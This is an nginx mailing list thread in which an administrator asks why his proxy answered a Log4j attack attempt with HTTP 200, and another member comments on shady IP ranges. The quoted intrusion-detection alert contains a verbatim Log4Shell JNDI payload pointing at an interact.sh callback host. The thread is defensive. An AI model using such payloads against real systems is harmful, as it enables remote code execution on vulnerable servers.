Thank you very much for your reply. I really appreciated it. I’ll wait for the final gurus feedback too.
Mauro > On 29 Dec 2021, at 18:03, lists <li...@lazygranch.com> wrote: > > That IP space is certified shady. I detect the occasional hack from them. See > > https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ > > and > > https://wirelessdataspco.org/faq.php > > These wireless companies will do anything for money including leasing their > IP space. > > I don't block the IP space since it could be from normal users. Plus plenty > of hacking comes from actual wireless providers customers. But I am appalled > highly profitable wireless providers lease ipv4 space to hackers for what is > pocket change for them. > > I will leave it up to the gurus to parse the log. > > > > > > > Original Message > > > From: mauro.trid...@cmcc.it > Sent: December 29, 2021 6:55 AM > To: nginx@nginx.org > Reply-to: nginx@nginx.org > Subject: Help request about Log4j attack attempts and NGINX logs meaning > > > > > Dear Users, > > > I have an old instance of NGINX (v.1.10.1) running as proxy server on a > dedicated hardware platform. > Since the proxy service is reachable from internet, it is constantly exposed > to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack attempts from > several malicious IPs. > > > At this moment, an host intrusion detection system (HIDS) is running and is > protecting the NGINX server: it seems it is blocking every malicious attack > attempts. > Anyway, during the last attack mail notification sent by the HIDS, I noticed > that the NGINX server response was “HTTP/1.1 200” and I’m very worried about > it. > Log4j and Java packages are NOT installed on the NGINX server and all the > servers behind the proxy are not using Log4j. > > > Could you please help me to understand the reason why the NGINX server answer > was “HTTP/1.1 200”!? > > > You can see below the mail notification I received: > > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." > Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET > /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} > HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-" > > > Thank you in advance, > Mauro > _______________________________________________ > nginx mailing list > nginx@nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx@nginx.org http://mailman.nginx.org/mailman/listinfo/nginx